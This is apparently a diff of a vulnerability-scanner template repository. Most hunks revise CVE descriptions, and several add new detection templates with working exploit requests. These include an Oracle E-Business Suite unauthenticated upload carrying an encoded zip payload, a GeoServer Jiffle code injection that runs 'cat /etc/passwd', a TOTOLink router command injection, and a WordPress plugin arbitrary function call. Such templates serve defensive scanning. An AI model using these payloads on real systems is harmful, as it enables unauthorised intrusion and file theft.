- https://huntr.dev/bounties/a25d15bd-cd23-487e-85cd-587960f1b9e7/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1883
|
||||
- https://github.com/camptocamp/terraboard/commit/2a5dbaac015dc0714b41a59995e24f5767f89ddc
|
||||
- https://huntr.dev/bounties/a25d15bd-cd23-487e-85cd-587960f1b9e7
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1883
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.8
|
||||
|
@ -41,3 +41,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-1916
|
||||
|
||||
info:
|
||||
name: Active Products Tables for WooCommerce < 1.0.5 - Cross Site Scripting
|
||||
name: WordPress Active Products Tables for WooCommerce <1.0.5 - Cross-Site Scripting
|
||||
author: Akincibor
|
||||
severity: medium
|
||||
description: |
|
||||
The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected cross-Site Scripting.
|
||||
WordPress Active Products Tables for WooCommerce plugin prior to 1.0.5 contains a cross-site scripting vulnerability.. The plugin does not sanitize and escape a parameter before outputting it back in the response of an AJAX action, An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/d16a0c3d-4318-4ecd-9e65-fc4165af8808
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1916
|
||||
|
@ -44,3 +44,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/13
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-1933
|
||||
|
||||
info:
|
||||
name: CDI < 5.1.9 - Cross Site Scripting
|
||||
name: WordPress CDI <5.1.9 - Cross Site Scripting
|
||||
author: Akincibor
|
||||
severity: medium
|
||||
description: |
|
||||
The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting.
|
||||
WordPress CDI plugin prior to 5.1.9 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the response of an AJAX action. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/6cedb27f-6140-4cba-836f-63de98e521bf
|
||||
- https://wordpress.org/plugins/collect-and-deliver-interface-for-woocommerce/advanced/
|
||||
|
@ -41,3 +41,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/13
|
||||
|
|
|
@ -0,0 +1,76 @@
|
|||
id: CVE-2022-21587
|
||||
|
||||
info:
|
||||
name: Oracle EBS Unauthenticated - Remote Code Execution
|
||||
author: rootxharsh,iamnoooob
|
||||
severity: critical
|
||||
description: |
|
||||
Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Upload). Supported versions that are affected are 12.2.3-12.2.11. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks of this vulnerability can result in takeover of Oracle Web Applications Desktop Integrator.
|
||||
reference:
|
||||
- https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/
|
||||
- https://www.oracle.com/security-alerts/cpuoct2022.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-21587
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-21587
|
||||
tags: cve,cve2022,rce,oast,intrusive,oracle,ebs,unauth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv
|
||||
|
||||
------WebKitFormBoundaryZsMro0UsAQYLDZGv
|
||||
Content-Disposition: form-data; name="bne:uueupload"
|
||||
|
||||
TRUE
|
||||
------WebKitFormBoundaryZsMro0UsAQYLDZGv
|
||||
Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip"
|
||||
|
||||
begin 664 test.zip
|
||||
M4$L#!!0``````"]P-%;HR5LG>@```'H```!#````+BXO+BXO+BXO+BXO+BXO
|
||||
M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.
|
||||
M1%=24BYP;'5S92!#1TD["G!R:6YT($-'23HZ:&5A9&5R*"`M='EP92`]/B`G
|
||||
M=&5X="]P;&%I;B<@*3L*;7D@)&-M9"`](")E8VAO($YU8VQE:2U#5D4M,C`R
|
||||
M,BTR,34X-R(["G!R:6YT('-Y<W1E;2@D8VUD*3L*97AI="`P.PH*4$L!`A0#
|
||||
M%```````+W`T5NC)6R=Z````>@```$,``````````````+2!`````"XN+RXN
|
||||
M+RXN+RXN+RXN+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO<V-R
|
||||
G:7!T<R]T>&M&3D174E(N<&Q02P4&``````$``0!Q````VP``````
|
||||
`
|
||||
end
|
||||
------WebKitFormBoundaryZsMro0UsAQYLDZGv--
|
||||
|
||||
- |
|
||||
GET /OA_CGI/FNDWRR.exe HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv
|
||||
|
||||
------WebKitFormBoundaryZsMro0UsAQYLDZGv
|
||||
Content-Disposition: form-data; name="bne:uueupload"
|
||||
|
||||
TRUE
|
||||
------WebKitFormBoundaryZsMro0UsAQYLDZGv
|
||||
Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip"
|
||||
|
||||
begin 664 test.zip
|
||||
M4$L#!!0``````&UP-%:3!M<R`0````$```!#````+BXO+BXO+BXO+BXO+BXO
|
||||
M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.
|
||||
M1%=24BYP;`I02P$"%`,4``````!M<#16DP;7,@$````!````0P``````````
|
||||
M````M($`````+BXO+BXO+BXO+BXO+BXO1DU77TAO;64O3W)A8VQE7T5"4RUA
|
||||
M<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.1%=24BYP;%!+!08``````0`!`'$`
|
||||
(``!B````````
|
||||
`
|
||||
end
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body_2
|
||||
words:
|
||||
- Nuclei-CVE-2022-21587
|
|
@ -5,12 +5,12 @@ info:
|
|||
author: EvergreenCartoons
|
||||
severity: medium
|
||||
description: |
|
||||
A Cross-site Scripting (XSS) vulnerability in the J-Web component of Juniper Networks Junos OS allows an unauthenticated attacker to run malicious scripts reflected off of J-Web to the victim's browser in the context of their session within J-Web
|
||||
Juniper Web Device Manager (J-Web) in Junos OS contains a cross-site scripting vulnerability. This can allow an unauthenticated attacker to run malicious scripts reflected off J-Web to the victim's browser in the context of their session within J-Web, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue affects all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2.
|
||||
reference:
|
||||
- https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-22242
|
||||
- https://supportportal.juniper.net/s/article/2022-10-Security-Bulletin-Junos-OS-Multiple-vulnerabilities-in-J-Web?language=en_US
|
||||
- https://kb.juniper.net/JSA69899
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-22242
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -43,3 +43,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/13
|
||||
|
|
|
@ -0,0 +1,48 @@
|
|||
id: CVE-2022-2314
|
||||
|
||||
info:
|
||||
name: VR Calendar < 2.3.2 - Unauthenticated Arbitrary Function Call
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The VR Calendar WordPress plugin through 2.3.2 lets any user execute arbitrary PHP functions on the site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/b22fe77c-844e-4c24-8023-014441cc1e82
|
||||
- https://wordpress.org/plugins/vr-calendar-sync/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-2314
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-2314
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: rce,unauth,wpscan,cve,cve2022,wp,vr-calendar-sync,wordpress,wp-plugin
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body_2
|
||||
words:
|
||||
- "phpinfo"
|
||||
- "PHP Version"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: body_1
|
||||
words:
|
||||
- "vrc-calendar"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,20 +1,25 @@
|
|||
id: CVE-2022-23854
|
||||
|
||||
info:
|
||||
name: AVEVA InTouch Access Anywhere Secure Gateway - Path Traversal
|
||||
name: AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion
|
||||
author: For3stCo1d
|
||||
severity: high
|
||||
description: |
|
||||
AVEVA Group plc is a marine and plant engineering IT company headquartered in Cambridge, England. AVEVA software is used in many sectors, including on- and off-shore oil and gas processing, chemicals, pharmaceuticals, nuclear and conventional power generation, nuclear fuel reprocessing, recycling and shipbuilding (https://www.aveva.com).
|
||||
AVEVA InTouch Access Anywhere Secure Gateway is vulnerable to local file inclusion.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/cve/CVE-2022-23854
|
||||
- https://www.aveva.com
|
||||
- https://crisec.de/advisory-aveva-intouch-access-anywhere-secure-gateway-path-traversal
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23854
|
||||
- https://www.cisa.gov/uscert/ics/advisories/icsa-22-342-02
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2022-23854
|
||||
cwe-id: CWE-23
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:"InTouch Access Anywhere"
|
||||
verified: "true"
|
||||
tags: lfi,packetstorm,cve,cve2022,aveva,intouch
|
||||
|
||||
requests:
|
||||
|
@ -38,3 +43,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2023/01/15
|
||||
|
|
|
@ -0,0 +1,73 @@
|
|||
id: CVE-2022-24816
|
||||
|
||||
info:
|
||||
name: Geoserver Server - Code Injection
|
||||
author: mukundbhuva
|
||||
severity: critical
|
||||
description: |
|
||||
Programs using jt-jiffle, and allowing Jiffle script to be provided via network request, are susceptible to a Remote Code Execution as the Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects the downstream GeoServer project Version < 1.1.22.
|
||||
reference:
|
||||
- https://www.synacktiv.com/en/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-24816
|
||||
- https://github.com/geosolutions-it/jai-ext/security/advisories/GHSA-v92f-jx6p-73rx
|
||||
- https://github.com/geosolutions-it/jai-ext/commit/cb1d6565d38954676b0a366da4f965fef38da1cb
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-24816
|
||||
cwe-id: CWE-94
|
||||
metadata:
|
||||
fofa-query: app="GeoServer"
|
||||
shodan-query: /geoserver/
|
||||
verified: "true"
|
||||
tags: cve,cve2022,geoserver,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /geoserver/wms HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/xml
|
||||
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<wps:Execute version="1.0.0" service="WPS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://www.opengis.net/wps/1.0.0" xmlns:wfs="http://www.opengis.net/wfs" xmlns:wps="http://www.opengis.net/wps/1.0.0" xmlns:ows="http://www.opengis.net/ows/1.1" xmlns:gml="http://www.opengis.net/gml" xmlns:ogc="http://www.opengis.net/ogc" xmlns:wcs="http://www.opengis.net/wcs/1.1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd">
|
||||
<ows:Identifier>ras:Jiffle</ows:Identifier>
|
||||
<wps:DataInputs>
|
||||
<wps:Input>
|
||||
<ows:Identifier>coverage</ows:Identifier>
|
||||
<wps:Data>
|
||||
<wps:ComplexData mimeType="application/arcgrid"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999 316]]></wps:ComplexData>
|
||||
</wps:Data>
|
||||
</wps:Input>
|
||||
<wps:Input>
|
||||
<ows:Identifier>script</ows:Identifier>
|
||||
<wps:Data>
|
||||
<wps:LiteralData>dest = y() - (500); // */ public class Double { public static double NaN = 0; static { try { java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("cat /etc/passwd").getInputStream())); String line = null; String allLines = " - "; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**</wps:LiteralData>
|
||||
</wps:Data>
|
||||
</wps:Input>
|
||||
<wps:Input>
|
||||
<ows:Identifier>outputType</ows:Identifier>
|
||||
<wps:Data>
|
||||
<wps:LiteralData>DOUBLE</wps:LiteralData>
|
||||
</wps:Data>
|
||||
</wps:Input>
|
||||
</wps:DataInputs>
|
||||
<wps:ResponseForm>
|
||||
<wps:RawDataOutput mimeType="image/tiff">
|
||||
<ows:Identifier>result</ows:Identifier>
|
||||
</wps:RawDataOutput>
|
||||
</wps:ResponseForm>
|
||||
</wps:Execute>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- "ExceptionInInitializerError"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,50 @@
|
|||
id: CVE-2022-25082
|
||||
|
||||
info:
|
||||
name: TOTOLink - Unauthenticated Command Injection
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: |
|
||||
TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the Main function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/cve-2022-25082
|
||||
- https://github.com/EPhaha/IOT_vuln/blob/main/TOTOLink/A950RG/README.md
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-25082
|
||||
cwe-id: CWE-77
|
||||
tags: totolink,cve,cve2022,router,unauth,rce,iot
|
||||
|
||||
variables:
|
||||
cmd: "`ls>../{{randstr}}`"
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /cgi-bin/downloadFlile.cgi?payload={{cmd}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /{{randstr}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body_2
|
||||
words:
|
||||
- ".sh"
|
||||
- ".cgi"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header_2
|
||||
words:
|
||||
- 'application/octet-stream'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/11/05
|
|
@ -1,16 +1,16 @@
|
|||
id: CVE-2022-26138
|
||||
|
||||
info:
|
||||
name: Questions For Confluence - Hardcoded Credentials
|
||||
name: Atlassian Questions For Confluence - Hardcoded Credentials
|
||||
author: HTTPVoid
|
||||
severity: critical
|
||||
description: |
|
||||
A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content accessible to users in the confluence-users group.
|
||||
Atlassian Questions For Confluence contains a hardcoded credentials vulnerability. When installing versions 2.7.34, 2.7.35, and 3.0.2, a Confluence user account is created in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password can exploit this vulnerability to log into Confluence and access all content accessible to users in the confluence-users group.
|
||||
reference:
|
||||
- https://twitter.com/fluepke/status/1549892089181257729
|
||||
- https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-26138
|
||||
- https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-26138
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -40,3 +40,5 @@ requests:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- 'location == "/httpvoid.action"'
|
||||
|
||||
# Enhanced by md on 2023/01/06
|
||||
|
|
|
@ -1,16 +1,19 @@
|
|||
id: CVE-2022-26263
|
||||
|
||||
info:
|
||||
name: Yonyou u8 v13.0 - Cross Site Scripting
|
||||
name: Yonyou U8 13.0 - Cross-Site Scripting
|
||||
author: edoardottt,theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
Yonyou u8 v13.0 was discovered to contain a DOM-based cross-site scripting (XSS) vulnerability via the component /u8sl/WebHelp.
|
||||
Yonyou U8 13.0 contains a DOM-based cross-site scripting vulnerability via the component /u8sl/WebHelp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://github.com/s7safe/CVE/blob/main/CVE-2022-26263.md
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-26263
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.4
|
||||
cve-id: CVE-2022-26263
|
||||
cwe-id: CWE-80
|
||||
metadata:
|
||||
verified: true
|
||||
google-dork: inurl:/u8sl/WebHelp
|
||||
|
@ -29,3 +32,5 @@ headless:
|
|||
- '<frame src="javascript:console.log(document.domain)"'
|
||||
- 'webhelp4.js'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/13
|
||||
|
|
|
@ -1,16 +1,15 @@
|
|||
id: CVE-2022-27593
|
||||
|
||||
info:
|
||||
name: QNAP QTS Photo Station External Reference
|
||||
name: QNAP QTS Photo Station External Reference - Local File Inclusion
|
||||
author: allenwest24
|
||||
severity: critical
|
||||
description: |
|
||||
An externally controlled reference to a resource vulnerability has been reported to affect QNAP NAS running Photo Station. If exploited, This could allow an attacker to modify system files. We have already fixed the vulnerability in the following versions: QTS 5.0.1: Photo Station 6.1.2 and later QTS 5.0.0/4.5.x: Photo Station 6.0.22 and later QTS 4.3.6: Photo Station 5.7.18 and later QTS 4.3.3: Photo Station 5.4.15 and later QTS 4.2.6: Photo Station 5.2.14 and later
|
||||
QNAP QTS Photo Station External Reference is vulnerable to local file inclusion via an externally controlled reference to a resource vulnerability. If exploited, this could allow an attacker to modify system files. The vulnerability is fixed in the following versions: QTS 5.0.1: Photo Station 6.1.2 and later QTS 5.0.0/4.5.x: Photo Station 6.0.22 and later QTS 4.3.6: Photo Station 5.7.18 and later QTS 4.3.3: Photo Station 5.4.15 and later QTS 4.2.6: Photo Station 5.2.14 and later.
|
||||
reference:
|
||||
- https://attackerkb.com/topics/7We3SjEYVo/cve-2022-27593
|
||||
- https://www.qnap.com/en/security-advisory/qsa-22-24
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-27593
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27593
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
|
||||
cvss-score: 9.1
|
||||
|
@ -39,3 +38,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2023/01/15
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue